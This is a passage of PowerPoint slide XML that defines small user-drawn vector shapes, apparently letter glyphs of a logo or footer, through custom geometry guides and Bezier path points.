                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8943975" y="4746626"/>
                  <a:ext cx="33338" cy="50800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 21"/>
                    <a:gd name="T1" fmla="*/ 0 h 32"/>
                    <a:gd name="T2" fmla="*/ 3 w 21"/>
                    <a:gd name="T3" fmla="*/ 0 h 32"/>
                    <a:gd name="T4" fmla="*/ 3 w 21"/>
                    <a:gd name="T5" fmla="*/ 13 h 32"/>
                    <a:gd name="T6" fmla="*/ 19 w 21"/>
                    <a:gd name="T7" fmla="*/ 13 h 32"/>
                    <a:gd name="T8" fmla="*/ 19 w 21"/>
                    <a:gd name="T9" fmla="*/ 0 h 32"/>
                    <a:gd name="T10" fmla="*/ 21 w 21"/>
                    <a:gd name="T11" fmla="*/ 0 h 32"/>
                    <a:gd name="T12" fmla="*/ 21 w 21"/>
                    <a:gd name="T13" fmla="*/ 32 h 32"/>
                    <a:gd name="T14" fmla="*/ 19 w 21"/>
                    <a:gd name="T15" fmla="*/ 32 h 32"/>
                    <a:gd name="T16" fmla="*/ 19 w 21"/>
                    <a:gd name="T17" fmla="*/ 16 h 32"/>
                    <a:gd name="T18" fmla="*/ 3 w 21"/>
                    <a:gd name="T19" fmla="*/ 16 h 32"/>
                    <a:gd name="T20" fmla="*/ 3 w 21"/>
                    <a:gd name="T21" fmla="*/ 32 h 32"/>
                    <a:gd name="T22" fmla="*/ 0 w 21"/>
                    <a:gd name="T23" fmla="*/ 32 h 32"/>
                    <a:gd name="T24" fmla="*/ 0 w 21"/>
                    <a:gd name="T2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32">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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87"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8990013" y="4745038"/>
                  <a:ext cx="52388" cy="52388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 20 w 23"/>
                    <a:gd name="T3" fmla="*/ 3 h 23"/>
                    <a:gd name="T4" fmla="*/ 23 w 23"/>
                    <a:gd name="T5" fmla="*/ 12 h 23"/>
                    <a:gd name="T6" fmla="*/ 20 w 23"/>
                    <a:gd name="T7" fmla="*/ 20 h 23"/>
                    <a:gd name="T8" fmla="*/ 11 w 23"/>
                    <a:gd name="T9" fmla="*/ 23 h 23"/>
                    <a:gd name="T10" fmla="*/ 3 w 23"/>
                    <a:gd name="T11" fmla="*/ 20 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>
                    <a:gd name="T13" fmla="*/ 12 h 23"/>
                    <a:gd name="T14" fmla="*/ 1 w 23"/>
                    <a:gd name="T15" fmla="*/ 6 h 23"/>
                    <a:gd name="T16" fmla="*/ 6 w 23"/>
                    <a:gd name="T17" fmla="*/ 2 h 23"/>
                    <a:gd name="T18" fmla="*/ 11 w 23"/>
                    <a:gd name="T19" fmla="*/ 0 h 23"/>
                    <a:gd name="T20" fmla="*/ 11 w 23"/>
                    <a:gd name="T21" fmla="*/ 2 h 23"/>
                    <a:gd name="T22" fmla="*/ 7 w 23"/>
                    <a:gd name="T23" fmla="*/ 4 h 23"/>
                    <a:gd name="T24" fmla="*/ 3 w 23"/>
                    <a:gd name="T25" fmla="*/ 7 h 23"/>
                    <a:gd name="T26" fmla="*/ 2 w 23"/>
                    <a:gd name="T27" fmla="*/ 12 h 23"/>
                    <a:gd name="T28" fmla="*/ 5 w 23"/>
                    <a:gd name="T29" fmla="*/ 18 h 23"/>
                    <a:gd name="T30" fmla="*/ 11 w 23"/>
                    <a:gd name="T31" fmla="*/ 21 h 23"/>
                    <a:gd name="T32" fmla="*/ 16 w 23"/>
                    <a:gd name="T33" fmla="*/ 20 h 23"/>
                    <a:gd name="T34" fmla="*/ 19 w 23"/>
                    <a:gd name="T35" fmla="*/ 16 h 23"/>
                    <a:gd name="T36" fmla="*/ 21 w 23"/>
                    <a:gd name="T37" fmla="*/ 12 h 23"/>
                    <a:gd name="T38" fmla="*/ 19 w 23"/>
                    <a:gd name="T39" fmla="*/ 7 h 23"/>
                    <a:gd name="T40" fmla="*/ 16 w 23"/>
                    <a:gd name="T41" fmla="*/ 4 h 23"/>
                    <a:gd name="T42" fmla="*/ 11 w 23"/>
                    <a:gd name="T43"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23">
                      <a:moveTo>
                        <a:pt x="11" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="0"/>
                        <a:pt x="17" y="1"/>
                        <a:pt x="20" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="6"/>
                        <a:pt x="23" y="8"/>
                        <a:pt x="23" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="15"/>
                        <a:pt x="22" y="18"/>
                        <a:pt x="20" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="22"/>
                        <a:pt x="15" y="23"/>
                        <a:pt x="11" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="23"/>
                        <a:pt x="5" y="22"/>
                        <a:pt x="3" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="18"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="8"/>
                        <a:pt x="1" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="4"/>
                        <a:pt x="4" y="3"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="0"/>
                        <a:pt x="11" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="11" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="4"/>
                        <a:pt x="4" y="6"/>
                        <a:pt x="3" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="8"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="5" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="20"/>
                        <a:pt x="9" y="21"/>
                        <a:pt x="11" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="21"/>
                        <a:pt x="15" y="21"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="19"/>
                        <a:pt x="19" y="18"/>
                        <a:pt x="19" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="15"/>
                        <a:pt x="21" y="13"/>
                        <a:pt x="21" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="10"/>
                        <a:pt x="20" y="8"/>
                        <a:pt x="19" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="17" y="4"/>
                        <a:pt x="16" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="2"/>
                        <a:pt x="1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88"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9047163" y="4746626"/>
                  <a:ext cx="26988" cy="50800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 3 h 32"/>
                    <a:gd name="T2" fmla="*/ 0 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 32"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 0 h 32"/>
                    <a:gd name="T6" fmla="*/ 17 w 17"/>
                    <a:gd name="T7" fmla="*/ 3 h 32"/>
                    <a:gd name="T8" fmla="*/ 10 w 17"/>
                    <a:gd name="T9" fmla="*/ 3 h 32"/>
                    <a:gd name="T10" fmla="*/ 10 w 17"/>
                    <a:gd name="T11" fmla="*/ 32 h 32"/>
                    <a:gd name="T12" fmla="*/ 7 w 17"/>
                    <a:gd name="T13" fmla="*/ 32 h 32"/>
                    <a:gd name="T14" fmla="*/ 7 w 17"/>
                    <a:gd name="T15" fmla="*/ 3 h 32"/>
                    <a:gd name="T16" fmla="*/ 0 w 17"/>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32">
                      <a:moveTo>
                        <a:pt x="0" y="3"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7"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89"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9078913" y="4745038"/>
                  <a:ext cx="53975" cy="52388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 20 w 23"/>
                    <a:gd name="T3" fmla="*/ 3 h 23"/>
                    <a:gd name="T4" fmla="*/ 23 w 23"/>
                    <a:gd name="T5" fmla="*/ 12 h 23"/>
                    <a:gd name="T6" fmla="*/ 20 w 23"/>
                    <a:gd name="T7" fmla="*/ 20 h 23"/>
                    <a:gd name="T8" fmla="*/ 12 w 23"/>
                    <a:gd name="T9" fmla="*/ 23 h 23"/>
                    <a:gd name="T10" fmla="*/ 4 w 23"/>
                    <a:gd name="T11" fmla="*/ 20 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>
                    <a:gd name="T13" fmla="*/ 12 h 23"/>
                    <a:gd name="T14" fmla="*/ 2 w 23"/>
                    <a:gd name="T15" fmla="*/ 6 h 23"/>
                    <a:gd name="T16" fmla="*/ 6 w 23"/>
                    <a:gd name="T17" fmla="*/ 2 h 23"/>
                    <a:gd name="T18" fmla="*/ 12 w 23"/>
                    <a:gd name="T19" fmla="*/ 0 h 23"/>
                    <a:gd name="T20" fmla="*/ 12 w 23"/>
                    <a:gd name="T21" fmla="*/ 2 h 23"/>
                    <a:gd name="T22" fmla="*/ 7 w 23"/>
                    <a:gd name="T23" fmla="*/ 4 h 23"/>
                    <a:gd name="T24" fmla="*/ 4 w 23"/>
                    <a:gd name="T25" fmla="*/ 7 h 23"/>
                    <a:gd name="T26" fmla="*/ 3 w 23"/>
                    <a:gd name="T27" fmla="*/ 12 h 23"/>
                    <a:gd name="T28" fmla="*/ 5 w 23"/>
                    <a:gd name="T29" fmla="*/ 18 h 23"/>
                    <a:gd name="T30" fmla="*/ 12 w 23"/>
                    <a:gd name="T31" fmla="*/ 21 h 23"/>
                    <a:gd name="T32" fmla="*/ 16 w 23"/>
                    <a:gd name="T33" fmla="*/ 20 h 23"/>
                    <a:gd name="T34" fmla="*/ 20 w 23"/>
                    <a:gd name="T35" fmla="*/ 16 h 23"/>
                    <a:gd name="T36" fmla="*/ 21 w 23"/>
                    <a:gd name="T37" fmla="*/ 12 h 23"/>
                    <a:gd name="T38" fmla="*/ 20 w 23"/>
                    <a:gd name="T39" fmla="*/ 7 h 23"/>
                    <a:gd name="T40" fmla="*/ 16 w 23"/>
                    <a:gd name="T41" fmla="*/ 4 h 23"/>
                    <a:gd name="T42" fmla="*/ 12 w 23"/>
                    <a:gd name="T43"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23">
                      <a:moveTo>
                        <a:pt x="12" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="0"/>
                        <a:pt x="18" y="1"/>
                        <a:pt x="20" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="6"/>
                        <a:pt x="23" y="8"/>
                        <a:pt x="23" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="15"/>
                        <a:pt x="22" y="18"/>
                        <a:pt x="20" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="22"/>
                        <a:pt x="15" y="23"/>
                        <a:pt x="12" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="23"/>
                        <a:pt x="6" y="22"/>
                        <a:pt x="4" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="18"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="4" y="3"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="10" y="0"/>
                        <a:pt x="12" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="7" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="4"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="3" y="10"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="5" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="20"/>
                        <a:pt x="9" y="21"/>
                        <a:pt x="12" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="21"/>
                        <a:pt x="15" y="21"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="19"/>
                        <a:pt x="19" y="18"/>
                        <a:pt x="20" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="15"/>
                        <a:pt x="21" y="13"/>
                        <a:pt x="21" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="10"/>
                        <a:pt x="21" y="8"/>
                        <a:pt x="20" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="18" y="4"/>
                        <a:pt x="16" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="2"/>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90"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8745538" y="4741863"/>
                  <a:ext cx="7938"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91"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8745538" y="4792663"/>
                  <a:ext cx="7938"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92"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9144000" y="4741863"/>
                  <a:ext cx="6350"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193"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9144000" y="4792663"/>
                  <a:ext cx="6350"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94"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8748713" y="4519613"/>
                  <a:ext cx="49213" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 21"/>
                    <a:gd name="T1" fmla="*/ 0 h 33"/>
                    <a:gd name="T2" fmla="*/ 7 w 21"/>
                    <a:gd name="T3" fmla="*/ 0 h 33"/>
                    <a:gd name="T4" fmla="*/ 14 w 21"/>
                    <a:gd name="T5" fmla="*/ 0 h 33"/>
                    <a:gd name="T6" fmla="*/ 19 w 21"/>
                    <a:gd name="T7" fmla="*/ 3 h 33"/>
                    <a:gd name="T8" fmla="*/ 21 w 21"/>
                    <a:gd name="T9" fmla="*/ 9 h 33"/>
                    <a:gd name="T10" fmla="*/ 19 w 21"/>
                    <a:gd name="T11" fmla="*/ 14 h 33"/>
                    <a:gd name="T12" fmla="*/ 14 w 21"/>
                    <a:gd name="T13" fmla="*/ 17 h 33"/>
                    <a:gd name="T14" fmla="*/ 6 w 21"/>
                    <a:gd name="T15" fmla="*/ 17 h 33"/>
                    <a:gd name="T16" fmla="*/ 3 w 21"/>
                    <a:gd name="T17" fmla="*/ 17 h 33"/>
                    <a:gd name="T18" fmla="*/ 3 w 21"/>
                    <a:gd name="T19" fmla="*/ 33 h 33"/>
                    <a:gd name="T20" fmla="*/ 0 w 21"/>
                    <a:gd name="T21" fmla="*/ 33 h 33"/>
                    <a:gd name="T22" fmla="*/ 0 w 21"/>
                    <a:gd name="T23" fmla="*/ 0 h 33"/>
                    <a:gd name="T24" fmla="*/ 3 w 21"/>
                    <a:gd name="T25" fmla="*/ 3 h 33"/>
                    <a:gd name="T26" fmla="*/ 3 w 21"/>
                    <a:gd name="T27" fmla="*/ 14 h 33"/>
                    <a:gd name="T28" fmla="*/ 9 w 21"/>
                    <a:gd name="T29" fmla="*/ 14 h 33"/>
                    <a:gd name="T30" fmla="*/ 14 w 21"/>
                    <a:gd name="T31" fmla="*/ 14 h 33"/>
                    <a:gd name="T32" fmla="*/ 16 w 21"/>
                    <a:gd name="T33" fmla="*/ 12 h 33"/>
                    <a:gd name="T34" fmla="*/ 17 w 21"/>
                    <a:gd name="T35" fmla="*/ 9 h 33"/>
                    <a:gd name="T36" fmla="*/ 16 w 21"/>
                    <a:gd name="T37" fmla="*/ 6 h 33"/>
                    <a:gd name="T38" fmla="*/ 14 w 21"/>
                    <a:gd name="T39" fmla="*/ 4 h 33"/>
                    <a:gd name="T40" fmla="*/ 9 w 21"/>
                    <a:gd name="T41" fmla="*/ 3 h 33"/>
                    <a:gd name="T42" fmla="*/ 3 w 21"/>
                    <a:gd name="T43"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33">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="13" y="0"/>
                        <a:pt x="14" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="1"/>
                        <a:pt x="18" y="2"/>
                        <a:pt x="19" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="5"/>
                        <a:pt x="21" y="6"/>
                        <a:pt x="21" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="11"/>
                        <a:pt x="20" y="13"/>
                        <a:pt x="19" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="15"/>
                        <a:pt x="16" y="16"/>
                        <a:pt x="14" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="17"/>
                        <a:pt x="10" y="17"/>
                        <a:pt x="6" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="17"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="3" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="33"/>
                        <a:pt x="3" y="33"/>
                        <a:pt x="3" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="33"/>
                        <a:pt x="0" y="33"/>
                        <a:pt x="0" y="33"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="3" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="14"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="13"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="16" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="17" y="10"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="7"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="16" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="5"/>
                        <a:pt x="15" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="11" y="3"/>
                        <a:pt x="9" y="3"/>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95"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8812213" y="4519613"/>
                  <a:ext cx="47625" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 21"/>
                    <a:gd name="T1" fmla="*/ 0 h 33"/>
                    <a:gd name="T2" fmla="*/ 7 w 21"/>
                    <a:gd name="T3" fmla="*/ 0 h 33"/>
                    <a:gd name="T4" fmla="*/ 14 w 21"/>
                    <a:gd name="T5" fmla="*/ 0 h 33"/>
                    <a:gd name="T6" fmla="*/ 19 w 21"/>
                    <a:gd name="T7" fmla="*/ 3 h 33"/>
                    <a:gd name="T8" fmla="*/ 21 w 21"/>
                    <a:gd name="T9" fmla="*/ 9 h 33"/>
                    <a:gd name="T10" fmla="*/ 20 w 21"/>
                    <a:gd name="T11" fmla="*/ 13 h 33"/>
                    <a:gd name="T12" fmla="*/ 16 w 21"/>
                    <a:gd name="T13" fmla="*/ 16 h 33"/>
                    <a:gd name="T14" fmla="*/ 10 w 21"/>
                    <a:gd name="T15" fmla="*/ 17 h 33"/>
                    <a:gd name="T16" fmla="*/ 21 w 21"/>
                    <a:gd name="T17" fmla="*/ 33 h 33"/>
                    <a:gd name="T18" fmla="*/ 17 w 21"/>
                    <a:gd name="T19" fmla="*/ 33 h 33"/>
                    <a:gd name="T20" fmla="*/ 5 w 21"/>
                    <a:gd name="T21" fmla="*/ 17 h 33"/>
                    <a:gd name="T22" fmla="*/ 4 w 21"/>
                    <a:gd name="T23" fmla="*/ 17 h 33"/>
                    <a:gd name="T24" fmla="*/ 4 w 21"/>
                    <a:gd name="T25" fmla="*/ 33 h 33"/>
                    <a:gd name="T26" fmla="*/ 0 w 21"/>
                    <a:gd name="T27" fmla="*/ 33 h 33"/>
                    <a:gd name="T28" fmla="*/ 0 w 21"/>
                    <a:gd name="T29" fmla="*/ 0 h 33"/>
                    <a:gd name="T30" fmla="*/ 4 w 21"/>
                    <a:gd name="T31" fmla="*/ 3 h 33"/>
                    <a:gd name="T32" fmla="*/ 4 w 21"/>
                    <a:gd name="T33" fmla="*/ 14 h 33"/>
                    <a:gd name="T34" fmla="*/ 9 w 21"/>
                    <a:gd name="T35" fmla="*/ 14 h 33"/>
                    <a:gd name="T36" fmla="*/ 14 w 21"/>
                    <a:gd name="T37" fmla="*/ 14 h 33"/>
                    <a:gd name="T38" fmla="*/ 17 w 21"/>
                    <a:gd name="T39" fmla="*/ 12 h 33"/>
                    <a:gd name="T40" fmla="*/ 17 w 21"/>
                    <a:gd name="T41" fmla="*/ 9 h 33"/>
                    <a:gd name="T42" fmla="*/ 17 w 21"/>
                    <a:gd name="T43" fmla="*/ 6 h 33"/>
                    <a:gd name="T44" fmla="*/ 14 w 21"/>
                    <a:gd name="T45" fmla="*/ 4 h 33"/>
                    <a:gd name="T46" fmla="*/ 9 w 21"/>
                    <a:gd name="T47" fmla="*/ 3 h 33"/>
                    <a:gd name="T48" fmla="*/ 4 w 21"/>
                    <a:gd name="T4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33">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="13" y="0"/>
                        <a:pt x="14" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="1"/>
                        <a:pt x="18" y="2"/>
                        <a:pt x="19" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="5"/>
                        <a:pt x="21" y="6"/>
                        <a:pt x="21" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="10"/>
                        <a:pt x="20" y="12"/>
                        <a:pt x="20" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="15"/>
                        <a:pt x="18" y="16"/>
                        <a:pt x="16" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="17"/>
                        <a:pt x="12" y="17"/>
                        <a:pt x="10" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="33"/>
                        <a:pt x="21" y="33"/>
                        <a:pt x="21" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="17"/>
                        <a:pt x="5" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="4" y="17"/>
                        <a:pt x="4" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="33"/>
                        <a:pt x="4" y="33"/>
                        <a:pt x="4" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="33"/>
                        <a:pt x="0" y="33"/>
